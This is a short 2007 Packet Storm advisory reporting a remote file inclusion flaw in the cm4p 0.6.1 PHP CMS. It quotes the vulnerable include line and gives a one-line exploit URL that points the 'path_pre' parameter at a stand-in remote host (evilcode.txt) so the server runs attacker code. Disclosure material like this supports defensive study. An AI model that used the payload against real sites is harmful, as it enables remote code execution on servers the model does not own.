cm4p-rfi.txt

2007-04-23T00:00:00
ID PACKETSTORM:56142
Type packetstorm
Reporter Silitoad
Modified 2007-04-23T00:00:00

Description

                                        
                                            `********************************************  
*AuThor:Silitoad ***************************  
*emA!l:Silitoad[at]hotmail[dot]Com *********  
*HoMePaGe: http://www.Arabian-FighterZ.com<http://www.arabian-fighterz.com/>*  
********************************************  
  
  
  
  
[Info]  
website: http://www.mariovaldez.net  
cms: cm4p  
Version: 0.6.1  
Download: http://www.mariovaldez.net/software/cm_4p/files/cm4p_0.6.1.zip  
Problem: Include file  
  
bug: include_once ($path_pre . "cm/cm_anon.inc.php");  
  
[Vuls]  
  
1.Full path disclosure:  
  
  
[Exploit]  
  
http://target.com/cm4p_0.6.1/cm/create.php?path_pre=http://evilcode.txt?  
  
  
  
[Greetings]  
  
Greets To  
Linux_m,Str0ke,l1nuxm4,Sn1p8r,Sbitar,Op3runix,simple_clan,l33t_b3k3rz,the  
leo from Midt  
`